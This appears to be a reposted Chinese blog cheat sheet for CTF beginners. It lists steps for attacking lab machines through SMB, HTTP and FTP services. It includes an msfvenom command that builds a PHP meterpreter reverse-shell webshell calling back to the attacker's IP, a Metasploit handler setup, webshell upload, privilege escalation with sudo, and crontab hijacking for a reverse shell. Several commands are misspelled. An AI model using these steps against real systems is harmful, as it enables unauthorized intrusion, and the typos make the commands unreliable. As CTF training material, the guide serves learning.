CTF小白

SMB信息泄露
首先,nmap -sV IP nmap –A –v –T4 IP
扫描开放的服务,及详细全部信息

针对SMB协议,使用空口令尝试登陆,下载查看敏感信息
smbclient –L IP 查看IP地址下SMB共享的文件
smbclient ‘\\IP\文件’ 远程进入该文件夹
get 下载文件

也可以利用版本漏洞
searchsploit 版本

针对http协议弱点分析
浏览器查看网页
使用dirb nikto探测
登陆目标服务后台,上传webshell
尤其注意数据库用户

制作webshell
msfvenom –p php/meterpreter/reverse_tcp lhost=攻击IP lport=4444 –f raw > /root/Desktop/shell.php

使用webshell
msfconsple
>use exploit/multi/hander
>set payload php/meterpreter/reverse_tcp
>show options
>set lhost IP
>run

在404上传点上传shell
在网页上访问

优化shell
python –c “import pty;pty.spawn(‘/bin/bash’)”

查看用户
cat /etc/passwd
su 切换用户
sudo -l
sudo su 获得权限

注意 /tmp缓冲目录和/etc/crontab设置的定时执行任务,将任务替换获得反弹shell

FTP

1. nmap 扫描
-sV -A –v –T4
2. FTP-21端口
3. 使用searchsploit 版本,搜索脚本,修改参数,使用代码
4. 或者使用msf远程溢出
msfconsole
> search 版本号
> use exploit/;;;;;;;;;;;;;;
>show payload
>set payload
>show opintion
>set 各个参数
>exploit

5.id 查看权限
优化终端
python “import pty;pty.spawn(‘/bin/bash’)”

6.查看flag

猜你喜欢

转载自www.cnblogs.com/Breader/p/11469687.html
ctf